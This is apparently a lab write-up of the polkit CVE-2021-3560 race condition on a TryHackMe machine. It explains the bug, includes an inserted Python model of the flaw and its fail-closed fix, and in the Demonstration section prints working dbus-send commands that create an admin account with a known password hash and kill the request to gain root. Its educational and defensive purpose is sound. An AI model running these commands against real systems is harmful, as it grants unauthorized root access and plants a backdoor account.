Background
Polkit (AKA PolicyKit) is an essential component in Unix-like OSs for controlling system wide privileges. As you can imagine, exploiting this can lead to some nasty privilege escalation. There were a few mainstream OSs vulnerable to this (such as Ubuntu 20.04 and Red Hat Enterprise Linux 8), making this a very impactful exploit.
Understanding how and why this works
The original report can be found here.
Polkit is used to allocate privileges for users and processes. This exploit takes advantage of our ability to kill a dbus-send command before the dbus daemon is able to pass Polkit the correct ID of the caller. In turn, Polkit hits an error, ignores it, and substitutes an ID of 0 (all privs/root).
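To make that failure mode concrete, here is an added, simplified Python model of the two ways a "who sent this message?" lookup can be handled. It is not polkit's code and not taken from the original post; the class and function names (SenderTable, resolve_uid_vulnerable, resolve_uid_hardened, check_privileged_action) are hypothetical, and the bus state it runs against is constructed inline. The point it shows is the one above: when the lookup error is swallowed, a zero-initialised uid silently becomes "root", whereas a fail-closed lookup refuses an unidentified caller.

```python
# Added illustration (not polkit's source): minimal model of the failure mode
# described in the text. All names here are hypothetical and exist only to show
# why "lookup failed" must never turn into "caller is root".
import logging
from typing import Dict, Optional

log = logging.getLogger("polkit-model")

ROOT_UID = 0


class SenderTable:
    """Stands in for the message bus answering 'which uid owns this sender?'.

    If the sending process has already exited (the window the race above
    relies on), the bus can no longer answer and the lookup fails.
    """

    def __init__(self, live_senders: Dict[str, int]):
        self.live_senders = live_senders  # unique bus name -> uid (constructed)

    def uid_of(self, sender: str) -> int:
        if sender not in self.live_senders:
            raise LookupError(f"sender {sender!r} no longer exists on the bus")
        return self.live_senders[sender]


def resolve_uid_vulnerable(bus: SenderTable, sender: str) -> int:
    """Bug pattern: the lookup error is logged and then ignored, so the
    zero-initialised uid (0 == root) is what the caller gets back."""
    uid = 0
    try:
        uid = bus.uid_of(sender)
    except LookupError as err:
        log.error("could not resolve sender: %s", err)  # error swallowed
    return uid


def resolve_uid_hardened(bus: SenderTable, sender: str) -> Optional[int]:
    """Fixed pattern: an unresolvable caller yields no identity at all."""
    try:
        return bus.uid_of(sender)
    except LookupError as err:
        log.error("could not resolve sender: %s", err)
        return None


def check_privileged_action(uid: Optional[int]) -> str:
    """Policy for an admin-only action such as creating an account:
    root is allowed outright, anyone else must authenticate, and an
    unidentified caller is refused (fail closed)."""
    if uid is None:
        return "deny"
    if uid == ROOT_UID:
        return "allow"
    return "auth_required"


def decide(resolver, bus: SenderTable, sender: str) -> str:
    """Run one authorization decision through the given uid resolver."""
    return check_privileged_action(resolver(bus, sender))


def demo() -> Dict[str, str]:
    # Constructed bus state: one live unprivileged client (":1.42", uid 1000);
    # the other sender (":1.99") exited before the bus could be asked about it.
    bus = SenderTable({":1.42": 1000})
    return {
        "live_vulnerable": decide(resolve_uid_vulnerable, bus, ":1.42"),
        "live_hardened": decide(resolve_uid_hardened, bus, ":1.42"),
        "gone_vulnerable": decide(resolve_uid_vulnerable, bus, ":1.99"),
        "gone_hardened": decide(resolve_uid_hardened, bus, ":1.99"),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:16} -> {outcome}")
```

Running it prints "auth_required" for the live client under both resolvers, but for the vanished sender the vulnerable resolver returns "allow" while the hardened one returns "deny". That difference is the whole bug class: an error path that leaves a privileged default in place instead of failing closed.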
Demonstration
I'll be using the polkit box from TryHackMe to demonstrate this.
We'll follow through the tutorial process. Our first command is:
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1
It's pretty long, so let's dissect it. The command is run and timed using "time". Remember we need the timing in order to work out when to kill the dbus-send command. Our dbus-send command requests the creation of a user called attacker (and prints the reply back to us). Typically this would happen through a GUI, and we'd then be prompted for a password.
That takes us to our next command:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$TRiYeJLXw8mLuoxS$UKtnjBa837v4gk8RsQL2qrxj.0P8c9kteeTnN.B3KeeeiWVIjyH17j6sLzmcSHn5HTZLGaaUDMC4MXCjIupp8.' string:'Ask the pentester' & sleep 0.005s; kill $!
To finish setting up our new account, we need to provide a password. The method takes a sha512crypt hash as input and uses that as the account's password. In plain text, the password is "Expl01ted".
Finally, we'll use the delay that we previously found to kill the command before the dbus-daemon is able to give Polkit our ID.
We're given a new account called attacker with the password of Expl01ted that's automatically added as a sudoer. We can su into this account and then sudo su to root.
How does this look in practice?
Honestly? It looks simpler than you'd expect. Other than the timing of the command, this is a low-complexity attack since there are copy-and-paste dbus commands that can be used for it. Even without those, some understanding of the dbus utilities is enough to exploit this.